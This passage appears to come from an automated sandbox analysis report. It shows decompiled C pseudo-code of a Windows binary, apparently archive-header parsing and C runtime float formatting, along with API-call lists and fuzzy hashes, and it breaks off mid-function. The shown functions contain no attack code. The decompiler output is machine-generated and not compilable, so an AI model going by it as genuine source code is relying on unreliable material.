                				}
                				_push(_t197 + 0x1104);
                				_push(_t229);
                				_push(_t197 + 0x28);
                				_push(_t233);
                				if(E00CA77F7(_t223, _t255) == 0) {
                					goto L27;
                				}
                				goto L9;
                			}


                APIs
                • __EH_prolog.LIBCMT ref: 00CA6FCB
                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 00CA712B
                • CloseHandle.KERNEL32(00000000), ref: 00CA713B
                  • Part of subcall function 00CA7A15: GetCurrentProcess.KERNEL32(00000020,?), ref: 00CA7A24
                  • Part of subcall function 00CA7A15: GetLastError.KERNEL32 ref: 00CA7A6A
                  • Part of subcall function 00CA7A15: CloseHandle.KERNEL32(?), ref: 00CA7A79
                • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 00CA7146
                • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00CA7254
                • DeviceIoControl.KERNEL32 ref: 00CA7280
                • CloseHandle.KERNEL32(?), ref: 00CA7292
                • GetLastError.KERNEL32(00000015,00000000,?), ref: 00CA72A2
                • RemoveDirectoryW.KERNEL32(?), ref: 00CA72EE
                • DeleteFileW.KERNEL32(?), ref: 00CA7316
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
                • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                • API String ID: 3935142422-3508440684
                • Opcode ID: 97cff6fd28fb4c52561f9d1bd6324443bc0ff04d65f7b84bd1cbed490c24dc5a
                • Instruction ID: 5928bef6415d227626379a3c11a9f1744371702249822b31a1e2124eeb8d58d7
                • Opcode Fuzzy Hash: 97cff6fd28fb4c52561f9d1bd6324443bc0ff04d65f7b84bd1cbed490c24dc5a
                • Instruction Fuzzy Hash: 2BB1D2719042199BDF21DFA4CC41BEE77B8FF09308F0446AAF91AE7142D770AA45CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 84%
                			E00CA30FC(intOrPtr* __ecx, void* __eflags) {
                				void* __ebp;
                				signed int _t242;
                				void* _t248;
                				unsigned int _t250;
                				signed int _t254;
                				signed int _t255;
                				unsigned int _t256;
                				void* _t257;
                				char _t270;
                				signed int _t289;
                				unsigned int _t290;
                				intOrPtr _t291;
                				signed int _t292;
                				signed int _t295;
                				char _t302;
                				signed char _t304;
                				signed int _t320;
                				signed int _t331;
                				signed int _t335;
                				signed int _t350;
                				signed char _t352;
                				unsigned int _t362;
                				void* _t378;
                				void* _t380;
                				void* _t381;
                				void* _t392;
                				intOrPtr* _t394;
                				intOrPtr* _t396;
                				signed int _t409;
                				signed int _t419;
                				char _t431;
                				signed int _t432;
                				signed int _t437;
                				signed int _t441;
                				intOrPtr _t449;
                				unsigned int _t455;
                				unsigned int _t458;
                				signed int _t462;
                				signed int _t470;
                				signed int _t479;
                				signed int _t484;
                				signed int _t498;
                				intOrPtr _t499;
                				signed int _t500;
                				signed char _t501;
                				unsigned int _t502;
                				void* _t509;
                				void* _t517;
                				signed int _t520;
                				void* _t521;
                				signed int _t531;
                				unsigned int _t534;
                				void* _t539;
                				intOrPtr _t543;
                				void* _t544;
                				void* _t545;
                				void* _t546;
                				intOrPtr _t556;
                
                				_t396 = __ecx;
                				_t546 = _t545 - 0x68;
                				E00CBD870(E00CD11A9, _t544);
                				E00CBD940();
                				_t394 = _t396;
                				E00CAC223(_t544 + 0x30, _t394);
                				 *(_t544 + 0x60) = 0;
                				 *((intOrPtr*)(_t544 - 4)) = 0;
                				if( *((intOrPtr*)(_t394 + 0x6cbc)) == 0) {
                					L15:
                					 *((char*)(_t544 + 0x6a)) = 0;
                					L16:
                					if(E00CAC42E(_t498, 7) >= 7) {
                						 *(_t394 + 0x21f4) = 0;
                						_t509 = _t394 + 0x21e4;
                						 *_t509 = E00CAC29E(_t544 + 0x30);
                						_t531 = E00CAC40A(_t544 + 0x30, 4);
                						_t242 = E00CAC39E(_t498);
                						__eflags = _t242 | _t498;
                						if((_t242 | _t498) == 0) {
                							L85:
                							E00CA1EF8(_t394);
                							L86:
                							E00CA159C(_t544 + 0x30);
                							 *[fs:0x0] =  *((intOrPtr*)(_t544 - 0xc));
                							return  *(_t544 + 0x60);
                						}
                						__eflags = _t531;
                						if(_t531 == 0) {
                							goto L85;
                						}
                						_t42 = _t531 - 3; // -3
                						_t534 = _t531 + 4 + _t242;
                						_t409 = _t42 + _t242;
                						__eflags = _t409;
                						 *(_t544 + 0x64) = _t534;
                						if(_t409 < 0) {
                							goto L85;
                						}
                						__eflags = _t534 - 7;
                						if(_t534 < 7) {
                							goto L85;
                						}
                						E00CAC42E(_t498, _t409);
                						__eflags =  *(_t544 + 0x48) - _t534;
                						if( *(_t544 + 0x48) < _t534) {
                							goto L17;
                						}
                						_t248 = E00CAC37E(_t544 + 0x30);
                						 *(_t394 + 0x21e8) = E00CAC39E(_t498);
                						_t250 = E00CAC39E(_t498);
                						 *(_t394 + 0x21ec) = _t250;
                						__eflags =  *_t509 - _t248;
                						 *(_t394 + 0x21f4) = _t250 >> 0x00000002 & 0x00000001;
                						 *(_t394 + 0x21f0) =  *(_t544 + 0x64);
                						_t254 =  *(_t394 + 0x21e8);
                						 *(_t394 + 0x21dc) = _t254;
                						_t255 = _t254 & 0xffffff00 |  *_t509 != _t248;
                						 *(_t544 + 0x6b) = _t255;
                						__eflags = _t255;
                						if(_t255 == 0) {
                							L26:
                							_t256 = 0;
                							__eflags =  *(_t394 + 0x21ec) & 0x00000001;
                							 *(_t544 + 0x58) = 0;
                							 *(_t544 + 0x54) = 0;
                							if(( *(_t394 + 0x21ec) & 0x00000001) == 0) {
                								L30:
                								__eflags =  *(_t394 + 0x21ec) & 0x00000002;
                								_t536 = _t256;
                								 *(_t544 + 0x64) = _t256;
                								 *(_t544 + 0x5c) = _t256;
                								if(( *(_t394 + 0x21ec) & 0x00000002) != 0) {
                									_t362 = E00CAC39E(_t498);
                									_t536 = _t362;
                									 *(_t544 + 0x64) = _t362;
                									 *(_t544 + 0x5c) = _t498;
                								}
                								_t257 = E00CA1901(_t394,  *(_t394 + 0x21f0));
                								_t499 = 0;
                								asm("adc eax, edx");
                								 *((intOrPtr*)(_t394 + 0x6ca8)) = E00CA3CA7( *((intOrPtr*)(_t394 + 0x6ca0)) + _t257,  *((intOrPtr*)(_t394 + 0x6ca4)), _t536,  *(_t544 + 0x5c), _t499, _t499);
                								 *((intOrPtr*)(_t394 + 0x6cac)) = _t499;
                								_t500 =  *(_t394 + 0x21e8);
                								__eflags = _t500 - 1;
                								if(__eflags == 0) {
                									E00CAA96C(_t394 + 0x2208);
                									_t419 = 5;
                									memcpy(_t394 + 0x2208, _t509, _t419 << 2);
                									_t501 = E00CAC39E(_t500);
                									 *(_t394 + 0x6cb5) = _t501 & 1;
                									 *(_t394 + 0x6cb4) = _t501 >> 0x00000002 & 1;
                									 *(_t394 + 0x6cb7) = _t501 >> 0x00000004 & 1;
                									_t431 = 1;
                									 *((char*)(_t394 + 0x6cba)) = 1;
                									 *(_t394 + 0x6cbb) = _t501 >> 0x00000003 & 1;
                									_t270 = 0;
                									 *((char*)(_t394 + 0x6cb8)) = 0;
                									__eflags = _t501 & 0x00000002;
                									if((_t501 & 0x00000002) == 0) {
                										 *((intOrPtr*)(_t394 + 0x6cd8)) = 0;
                									} else {
                										 *((intOrPtr*)(_t394 + 0x6cd8)) = E00CAC39E(_t501);
                										_t270 = 0;
                										_t431 = 1;
                									}
                									__eflags =  *(_t394 + 0x6cb5);
                									if( *(_t394 + 0x6cb5) == 0) {
                										L81:
                										_t431 = _t270;
                										goto L82;
                									} else {
                										__eflags =  *((intOrPtr*)(_t394 + 0x6cd8)) - _t270;
                										if( *((intOrPtr*)(_t394 + 0x6cd8)) == _t270) {
                											L82:
                											 *((char*)(_t394 + 0x6cb9)) = _t431;
                											_t432 =  *(_t544 + 0x58);
                											__eflags = _t432 |  *(_t544 + 0x54);
                											if((_t432 |  *(_t544 + 0x54)) != 0) {
                												E00CA200C(_t394, _t544 + 0x30, _t432, _t394 + 0x2208);
                											}
                											L84:
                											 *(_t544 + 0x60) =  *(_t544 + 0x48);
                											goto L86;
                										}
                										goto L81;
                									}
                								}
                								if(__eflags <= 0) {
                									goto L84;
                								}
                								__eflags = _t500 - 3;
                								if(_t500 <= 3) {
                									__eflags = _t500 - 2;
                									_t120 = (0 | _t500 != 0x00000002) - 1; // -1
                									_t517 = (_t120 & 0xffffdcb0) + 0x45d0 + _t394;
                									 *(_t544 + 0x2c) = _t517;
                									E00CAA8D2(_t517, 0);
                									_t437 = 5;
                									memcpy(_t517, _t394 + 0x21e4, _t437 << 2);
                									_t539 =  *(_t544 + 0x2c);
                									 *(_t544 + 0x60) =  *(_t394 + 0x21e8);
                									 *(_t539 + 0x1058) =  *(_t544 + 0x64);
                									 *((char*)(_t539 + 0x10f9)) = 1;
                									 *(_t539 + 0x105c) =  *(_t544 + 0x5c);
                									 *(_t539 + 0x1094) = E00CAC39E(_t500);
                									 *(_t539 + 0x1060) = E00CAC39E(_t500);
                									_t289 =  *(_t539 + 0x1094) >> 0x00000003 & 0x00000001;
                									__eflags = _t289;
                									 *(_t539 + 0x1064) = _t500;
                									 *(_t539 + 0x109a) = _t289;
                									if(_t289 != 0) {
                										 *(_t539 + 0x1060) = 0x7fffffff;
                										 *(_t539 + 0x1064) = 0x7fffffff;
                									}
                									_t441 =  *(_t539 + 0x105c);
                									_t520 =  *(_t539 + 0x1064);
                									_t290 =  *(_t539 + 0x1058);
                									_t502 =  *(_t539 + 0x1060);
                									__eflags = _t441 - _t520;
                									if(__eflags < 0) {
                										L51:
                										_t290 = _t502;
                										_t441 = _t520;
                										goto L52;
                									} else {
                										if(__eflags > 0) {
                											L52:
                											 *(_t539 + 0x106c) = _t441;
                											 *(_t539 + 0x1068) = _t290;
                											_t291 = E00CAC39E(_t502);
                											__eflags =  *(_t539 + 0x1094) & 0x00000002;
                											 *((intOrPtr*)(_t539 + 0x24)) = _t291;
                											if(( *(_t539 + 0x1094) & 0x00000002) != 0) {
                												E00CB0A25(_t539 + 0x1040, _t502, E00CAC29E(_t544 + 0x30), 0);
                											}
                											 *(_t539 + 0x1070) =  *(_t539 + 0x1070) & 0x00000000;
                											__eflags =  *(_t539 + 0x1094) & 0x00000004;
                											if(( *(_t539 + 0x1094) & 0x00000004) != 0) {
                												 *(_t539 + 0x1070) = 2;
                												 *((intOrPtr*)(_t539 + 0x1074)) = E00CAC29E(_t544 + 0x30);
                											}
                											 *(_t539 + 0x1100) =  *(_t539 + 0x1100) & 0x00000000;
                											_t292 = E00CAC39E(_t502);
                											 *(_t544 + 0x64) = _t292;
                											 *(_t539 + 0x20) = _t292 >> 0x00000007 & 0x00000007;
                											_t449 = (_t292 & 0x0000003f) + 0x32;
                											 *((intOrPtr*)(_t539 + 0x1c)) = _t449;
                											__eflags = _t449 - 0x32;
                											if(_t449 != 0x32) {
                												 *((intOrPtr*)(_t539 + 0x1c)) = 0x270f;
                											}
                											 *((char*)(_t539 + 0x18)) = E00CAC39E(_t502);
                											_t521 = E00CAC39E(_t502);
                											 *(_t539 + 0x10fc) = 2;
                											_t295 =  *((intOrPtr*)(_t539 + 0x18));
                											 *(_t539 + 0x10f8) =  *(_t394 + 0x21ec) >> 0x00000006 & 1;
                											__eflags = _t295 - 1;
                											if(_t295 != 1) {
                												__eflags = _t295;
                												if(_t295 == 0) {
                													_t177 = _t539 + 0x10fc;
                													 *_t177 =  *(_t539 + 0x10fc) & 0x00000000;
                													__eflags =  *_t177;
                												}
                											} else {
                												 *(_t539 + 0x10fc) = 1;
                											}
                											_t455 =  *(_t539 + 8);
                											 *(_t539 + 0x1098) = _t455 >> 0x00000003 & 1;
                											 *(_t539 + 0x10fa) = _t455 >> 0x00000005 & 1;
                											__eflags =  *(_t544 + 0x60) - 2;
                											_t458 =  *(_t544 + 0x64);
                											 *(_t539 + 0x1099) = _t455 >> 0x00000004 & 1;
                											if( *(_t544 + 0x60) != 2) {
                												L65:
                												_t302 = 0;
                												__eflags = 0;
                												goto L66;
                											} else {
                												__eflags = _t458 & 0x00000040;
                												if((_t458 & 0x00000040) == 0) {
                													goto L65;
                												}
                												_t302 = 1;
                												L66:
                												 *((char*)(_t539 + 0x10f0)) = _t302;
                												_t304 =  *(_t539 + 0x1094) & 1;
                												 *(_t539 + 0x10f1) = _t304;
                												asm("sbb eax, eax");
                												 *(_t539 + 0x10f4) =  !( ~(_t304 & 0x000000ff)) & 0x00020000 << (_t458 >> 0x0000000a & 0x0000000f);
                												asm("sbb eax, eax");
                												 *(_t539 + 0x109c) =  ~( *(_t539 + 0x109b) & 0x000000ff) & 0x00000005;
                												__eflags = _t521 - 0x1fff;
                												if(_t521 >= 0x1fff) {
                													_t521 = 0x1fff;
                												}
                												E00CAC300(_t544 + 0x30, _t544 - 0x2074, _t521);
                												 *((char*)(_t544 + _t521 - 0x2074)) = 0;
                												_push(0x800);
                												_t522 = _t539 + 0x28;
                												_push(_t539 + 0x28);
                												_push(_t544 - 0x2074);
                												E00CB1094();
                												_t462 =  *(_t544 + 0x58);
                												__eflags = _t462 |  *(_t544 + 0x54);
                												if((_t462 |  *(_t544 + 0x54)) != 0) {
                													E00CA200C(_t394, _t544 + 0x30, _t462, _t539);
                												}
                												_t319 =  *(_t544 + 0x60);
                												__eflags =  *(_t544 + 0x60) - 2;
                												if( *(_t544 + 0x60) != 2) {
                													L72:
                													_t320 = E00CC2B69(_t319, _t522, L"CMT");
                													__eflags = _t320;
                													if(_t320 == 0) {
                														 *((char*)(_t394 + 0x6cb6)) = 1;
                													}
                													goto L74;
                												} else {
                													E00CA1F3D(_t394, _t539);
                													_t319 =  *(_t544 + 0x60);
                													__eflags =  *(_t544 + 0x60) - 2;
                													if( *(_t544 + 0x60) == 2) {
                														L74:
                														__eflags =  *(_t544 + 0x6b);
                														if(__eflags != 0) {
                															E00CA6BF5(__eflags, 0x1c, _t394 + 0x1e, _t522);
                														}
                														goto L84;
                													}
                													goto L72;
                												}
                											}
                										}
                										__eflags = _t290 - _t502;
                										if(_t290 > _t502) {
                											goto L52;
                										}
                										goto L51;
                									}
                								}
                								__eflags = _t500 - 4;
                								if(_t500 == 4) {
                									_t470 = 5;
                									memcpy(_t394 + 0x2248, _t394 + 0x21e4, _t470 << 2);
                									_t331 = E00CAC39E(_t500);
                									__eflags = _t331;
                									if(_t331 == 0) {
                										 *(_t394 + 0x225c) = E00CAC39E(_t500) & 0x00000001;
                										_t335 = E00CAC251(_t544 + 0x30) & 0x000000ff;
                										 *(_t394 + 0x2260) = _t335;
                										__eflags = _t335 - 0x18;
                										if(_t335 <= 0x18) {
                											E00CAC300(_t544 + 0x30, _t394 + 0x2264, 0x10);
                											__eflags =  *(_t394 + 0x225c);
                											if( *(_t394 + 0x225c) != 0) {
                												E00CAC300(_t544 + 0x30, _t394 + 0x2274, 8);
                												E00CAC300(_t544 + 0x30, _t544 + 0x64, 4);
                												E00CAF524(_t544 - 0x74);
                												E00CAF56A(_t544 - 0x74, _t394 + 0x2274, 8);
                												_push(_t544 + 8);
                												E00CAF435(_t544 - 0x74);
                												_t350 = E00CBF3CA(_t544 + 0x64, _t544 + 8, 4);
                												asm("sbb al, al");
                												_t352 =  ~_t350 + 1;
                												__eflags = _t352;
                												 *(_t394 + 0x225c) = _t352;
                											}
                											 *((char*)(_t394 + 0x6cbc)) = 1;
                											goto L84;
                										}
                										_push(_t335);
                										_push(L"hc%u");
                										L40:
                										_push(0x14);
                										_push(_t544);
                										E00CA3E41();
                										E00CA3DEC(_t394, _t394 + 0x1e, _t544);
                										goto L86;
                									}
                									_push(_t331);
                									_push(L"h%u");
                									goto L40;
                								}
                								__eflags = _t500 - 5;
                								if(_t500 == 5) {
                									_t479 = _t500;
                									memcpy(_t394 + 0x4590, _t394 + 0x21e4, _t479 << 2);
                									 *(_t394 + 0x45ac) = E00CAC39E(_t500) & 0x00000001;
                									 *((short*)(_t394 + 0x45ae)) = 0;
                									 *((char*)(_t394 + 0x45ad)) = 0;
                								}
                								goto L84;
                							}
                							_t484 = E00CAC39E(_t498);
                							 *(_t544 + 0x54) = _t498;
                							_t256 = 0;
                							 *(_t544 + 0x58) = _t484;
                							__eflags = _t498;
                							if(__eflags < 0) {
                								goto L30;
                							}
                							if(__eflags > 0) {
                								goto L85;
                							}
                							__eflags = _t484 -  *(_t394 + 0x21f0);
                							if(_t484 >=  *(_t394 + 0x21f0)) {
                								goto L85;
                							}
                							goto L30;
                						}
                						E00CA1EF8(_t394);
                						 *((char*)(_t394 + 0x6cc4)) = 1;
                						E00CA6E03(0xce00e0, 3);
                						__eflags =  *((char*)(_t544 + 0x6a));
                						if(__eflags == 0) {
                							goto L26;
                						} else {
                							E00CA6BF5(__eflags, 4, _t394 + 0x1e, _t394 + 0x1e);
                							 *((char*)(_t394 + 0x6cc5)) = 1;
                							goto L86;
                						}
                					}
                					L17:
                					E00CA3DAB(_t394, _t498);
                					goto L86;
                				}
                				_t498 =  *((intOrPtr*)(_t394 + 0x6cc0)) + 8;
                				asm("adc eax, ecx");
                				_t556 =  *((intOrPtr*)(_t394 + 0x6ca4));
                				if(_t556 < 0 || _t556 <= 0 &&  *((intOrPtr*)(_t394 + 0x6ca0)) <= _t498) {
                					goto L15;
                				} else {
                					_push(0x10);
                					_push(_t544 + 0x18);
                					 *((char*)(_t544 + 0x6a)) = 1;
                					if( *((intOrPtr*)( *_t394 + 0xc))() != 0x10) {
                						goto L17;
                					}
                					if( *((char*)( *((intOrPtr*)(_t394 + 0x21bc)) + 0x5124)) != 0) {
                						L7:
                						 *(_t544 + 0x6b) = 1;
                						L8:
                						E00CA3C40(_t394);
                						_t529 = _t394 + 0x2264;
                						_t543 = _t394 + 0x1024;
                						E00CA607D(_t543, 0, 5,  *((intOrPtr*)(_t394 + 0x21bc)) + 0x5024, _t394 + 0x2264, _t544 + 0x18,  *(_t394 + 0x2260), 0, _t544 + 0x28);
                						if( *(_t394 + 0x225c) == 0) {
                							L13:
                							 *((intOrPtr*)(_t544 + 0x50)) = _t543;
                							goto L16;
                						} else {
                							_t378 = _t394 + 0x2274;
                							while(1) {
                								_t380 = E00CBF3CA(_t544 + 0x28, _t378, 8);
                								_t546 = _t546 + 0xc;
                								if(_t380 == 0) {
                									goto L13;
                								}
                								_t563 =  *(_t544 + 0x6b);
                								_t381 = _t394 + 0x1e;
                								_push(_t381);
                								_push(_t381);
                								if( *(_t544 + 0x6b) != 0) {
                									_push(6);
                									E00CA6BF5(__eflags);
                									 *((char*)(_t394 + 0x6cc5)) = 1;
                									E00CA6E03(0xce00e0, 0xb);
                									goto L86;
                								}
                								_push(0x7d);
                								E00CA6BF5(_t563);
                								E00CAE797( *((intOrPtr*)(_t394 + 0x21bc)) + 0x5024);
                								E00CA3C40(_t394);
                								E00CA607D(_t543, 0, 5,  *((intOrPtr*)(_t394 + 0x21bc)) + 0x5024, _t529, _t544 + 0x18,  *(_t394 + 0x2260), 0, _t544 + 0x28);
                								_t378 = _t394 + 0x2274;
                								if( *(_t394 + 0x225c) != 0) {
                									continue;
                								}
                								goto L13;
                							}
                							goto L13;
                						}
                					}
                					_t392 = E00CB0FBA();
                					 *(_t544 + 0x6b) = 0;
                					if(_t392 == 0) {
                						goto L8;
                					}
                					goto L7;
                				}
                			}


                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: H_prolog_memcmp
                • String ID: CMT$h%u$hc%u
                • API String ID: 3004599000-3282847064
                • Opcode ID: fa67cf9226612bf87aef1ae02db21664cb4ec315b8d23ff11ab80b4baed4ea70
                • Instruction ID: c2f640063404fbc933d148e41098efa4f278efca7dbadf90474c2803988458e7
                • Opcode Fuzzy Hash: fa67cf9226612bf87aef1ae02db21664cb4ec315b8d23ff11ab80b4baed4ea70
                • Instruction Fuzzy Hash: 113206715003869FDF14DF74C8A5AEA37A5AF16308F04447EFD5ACB282DB34AA48DB20
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 68%
                			E00CCC55E(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr* _a16, signed int _a20, intOrPtr _a24) {
                				signed int _v8;
                				signed int _v32;
                				signed int _v36;
                				char _v460;
                				signed int _v464;
                				void _v468;
                				signed int _v472;
                				signed int _v932;
                				signed int _v936;
                				signed int _v1392;
                				signed int _v1396;
                				signed int _v1400;
                				char _v1860;
                				signed int _v1864;
                				signed int _v1865;
                				signed int _v1872;
                				signed int _v1876;
                				signed int _v1880;
                				signed int _v1884;
                				signed int _v1888;
                				signed int _v1892;
                				signed int _v1896;
                				intOrPtr _v1900;
                				signed int _v1904;
                				signed int _v1908;
                				signed int _v1912;
                				signed int _v1916;
                				signed int _v1920;
                				signed int _v1924;
                				signed int _v1928;
                				char _v1936;
                				char _v1944;
                				char _v2404;
                				signed int _v2408;
                				signed int _t743;
                				signed int _t753;
                				signed int _t754;
                				intOrPtr _t763;
                				signed int _t764;
                				intOrPtr _t767;
                				intOrPtr _t770;
                				intOrPtr _t772;
                				intOrPtr _t773;
                				void* _t774;
                				signed int _t777;
                				signed int _t778;
                				signed int _t784;
                				signed int _t790;
                				intOrPtr _t792;
                				void* _t793;
                				signed int _t794;
                				signed int _t795;
                				signed int _t796;
                				signed int _t805;
                				signed int _t810;
                				signed int _t811;
                				signed int _t812;
                				signed int _t815;
                				signed int _t816;
                				signed int _t817;
                				signed int _t819;
                				signed int _t820;
                				signed int _t825;
                				signed int _t826;
                				signed int _t832;
                				signed int _t833;
                				signed int _t836;
                				signed int _t841;
                				signed int _t849;
                				signed int* _t852;
                				signed int _t856;
                				signed int _t867;
                				signed int _t868;
                				signed int _t870;
                				char* _t871;
                				signed int _t874;
                				signed int _t878;
                				signed int _t879;
                				signed int _t884;
                				signed int _t886;
                				signed int _t891;
                				signed int _t900;
                				signed int _t903;
                				signed int _t905;
                				signed int _t908;
                				signed int _t909;
                				signed int _t910;
                				signed int _t913;
                				signed int _t926;
                				signed int _t927;
                				signed int _t929;
                				char* _t930;
                				signed int _t933;
                				signed int _t937;
                				signed int _t938;
                				signed int* _t940;
                				signed int _t943;
                				signed int _t945;
                				signed int _t950;
                				signed int _t958;
                				signed int _t961;
                				signed int _t965;
                				signed int* _t972;
                				intOrPtr _t974;
                				void* _t975;
                				intOrPtr* _t977;
                				signed int* _t981;
                				unsigned int _t992;
                				signed int _t993;
                				void* _t996;
                				signed int _t997;
                				void* _t999;
                				signed int _t1000;
                				signed int _t1001;
                				signed int _t1002;
                				signed int _t1012;
                				signed int _t1017;
                				signed int _t1020;
                				unsigned int _t1023;
                				signed int _t1024;
                				void* _t1027;
                				signed int _t1028;
                				void* _t1030;
                				signed int _t1031;
                				signed int _t1032;
                				signed int _t1033;
                				signed int _t1038;
                				signed int* _t1043;
                				signed int _t1045;
                				signed int _t1055;
                				void _t1058;
                				signed int _t1061;
                				void* _t1064;
                				void* _t1071;
                				signed int _t1077;
                				signed int _t1078;
                				signed int _t1081;
                				signed int _t1082;
                				signed int _t1084;
                				signed int _t1085;
                				signed int _t1086;
                				signed int _t1090;
                				signed int _t1094;
                				signed int _t1095;
                				signed int _t1096;
                				signed int _t1098;
                				signed int _t1099;
                				signed int _t1100;
                				signed int _t1101;
                				signed int _t1102;
                				signed int _t1103;
                				signed int _t1105;
                				signed int _t1106;
                				signed int _t1107;
                				signed int _t1108;
                				signed int _t1109;
                				signed int _t1110;
                				unsigned int _t1111;
                				void* _t1114;
                				intOrPtr _t1116;
                				signed int _t1117;
                				signed int _t1118;
                				signed int _t1119;
                				signed int* _t1123;
                				void* _t1127;
                				void* _t1128;
                				signed int _t1129;
                				signed int _t1130;
                				signed int _t1131;
                				signed int _t1134;
                				signed int _t1135;
                				signed int _t1140;
                				void* _t1142;
                				signed int _t1143;
                				signed int _t1146;
                				char _t1151;
                				signed int _t1153;
                				signed int _t1154;
                				signed int _t1155;
                				signed int _t1156;
                				signed int _t1157;
                				signed int _t1158;
                				signed int _t1159;
                				signed int _t1163;
                				signed int _t1164;
                				signed int _t1165;
                				signed int _t1166;
                				signed int _t1167;
                				unsigned int _t1170;
                				void* _t1174;
                				void* _t1175;
                				unsigned int _t1176;
                				signed int _t1181;
                				signed int _t1182;
                				signed int _t1184;
                				signed int _t1185;
                				intOrPtr* _t1187;
                				signed int _t1188;
                				signed int _t1190;
                				signed int _t1191;
                				signed int _t1194;
                				signed int _t1196;
                				signed int _t1197;
                				void* _t1198;
                				signed int _t1199;
                				signed int _t1200;
                				signed int _t1201;
                				void* _t1204;
                				signed int _t1205;
                				signed int _t1206;
                				signed int _t1207;
                				signed int _t1208;
                				signed int _t1209;
                				signed int* _t1212;
                				signed int _t1213;
                				signed int _t1214;
                				signed int _t1215;
                				signed int _t1216;
                				intOrPtr* _t1218;
                				intOrPtr* _t1219;
                				signed int _t1221;
                				signed int _t1223;
                				signed int _t1226;
                				signed int _t1232;
                				signed int _t1236;
                				signed int _t1237;
                				signed int _t1242;
                				signed int _t1245;
                				signed int _t1246;
                				signed int _t1247;
                				signed int _t1248;
                				signed int _t1249;
                				signed int _t1250;
                				signed int _t1252;
                				signed int _t1253;
                				signed int _t1254;
                				signed int _t1255;
                				signed int _t1257;
                				signed int _t1258;
                				signed int _t1259;
                				signed int _t1260;
                				signed int _t1261;
                				signed int _t1263;
                				signed int _t1264;
                				signed int _t1266;
                				signed int _t1268;
                				signed int _t1270;
                				signed int _t1273;
                				signed int _t1275;
                				signed int* _t1276;
                				signed int* _t1279;
                				signed int _t1288;
                
                				_t1142 = __edx;
                				_t1273 = _t1275;
                				_t1276 = _t1275 - 0x964;
                				_t743 =  *0xcdd668; // 0x814d2927
                				_v8 = _t743 ^ _t1273;
                				_t1055 = _a20;
                				_push(__esi);
                				_push(__edi);
                				_t1187 = _a16;
                				_v1924 = _t1187;
                				_v1920 = _t1055;
                				E00CCC078( &_v1944, __eflags);
                				_t1236 = _a8;
                				_t748 = 0x2d;
                				if((_t1236 & 0x80000000) == 0) {
                					_t748 = 0x120;
                				}
                				 *_t1187 = _t748;
                				 *((intOrPtr*)(_t1187 + 8)) = _t1055;
                				_t1188 = _a4;
                				if((_t1236 & 0x7ff00000) != 0) {
                					L5:
                					_t753 = E00CC86BF( &_a4);
                					_pop(_t1070);
                					__eflags = _t753;
                					if(_t753 != 0) {
                						_t1070 = _v1924;
                						 *((intOrPtr*)(_v1924 + 4)) = 1;
                					}
                					_t754 = _t753 - 1;
                					__eflags = _t754;
                					if(_t754 == 0) {
                						_push("1#INF");
                						goto L308;
                					} else {
                						_t777 = _t754 - 1;
                						__eflags = _t777;
                						if(_t777 == 0) {
                							_push("1#QNAN");
                							goto L308;
                						} else {
                							_t778 = _t777 - 1;
                							__eflags = _t778;
                							if(_t778 == 0) {
                								_push("1#SNAN");
                								goto L308;
                							} else {
                								__eflags = _t778 == 1;
                								if(_t778 == 1) {
                									_push("1#IND");
                									goto L308;
                								} else {
                									_v1928 = _v1928 & 0x00000000;
                									_a4 = _t1188;
                									_a8 = _t1236 & 0x7fffffff;
                									_t1288 = _a4;
                									asm("fst qword [ebp-0x768]");
                									_t1190 = _v1896;
                									_v1916 = _a12 + 1;
                									_t1077 = _t1190 >> 0x14;
                									_t784 = _t1077 & 0x000007ff;
                									__eflags = _t784;
                									if(_t784 != 0) {
                										_t1143 = 0;
                										_t784 = 0;
                										__eflags = 0;
                									} else {
                										_t1143 = 1;
                									}
                									_t1191 = _t1190 & 0x000fffff;
                									_t1058 = _v1900 + _t784;
                									asm("adc edi, esi");
                									__eflags = _t1143;
                									_t1078 = _t1077 & 0x000007ff;
                									_t1242 = _t1078 - 0x434 + (0 | _t1143 != 0x00000000) + 1;
                									_v1872 = _t1242;
                									E00CCE0C0(_t1078, _t1288);
                									_push(_t1078);
                									_push(_t1078);
                									 *_t1276 = _t1288;
                									_t790 = E00CD0F10(E00CCE1D0(_t1191, _t1242), _t1288);
                									_v1904 = _t790;
                									__eflags = _t790 - 0x7fffffff;
                									if(_t790 == 0x7fffffff) {
                										L16:
                										__eflags = 0;
                										_v1904 = 0;
                									} else {
                										__eflags = _t790 - 0x80000000;
                										if(_t790 == 0x80000000) {
                											goto L16;
                										}
                									}
                									_v468 = _t1058;
                									__eflags = _t1191;
                									_v464 = _t1191;
                									_t1061 = (0 | _t1191 != 0x00000000) + 1;
                									_v472 = _t1061;
                									__eflags = _t1242;
                									if(_t1242 < 0) {
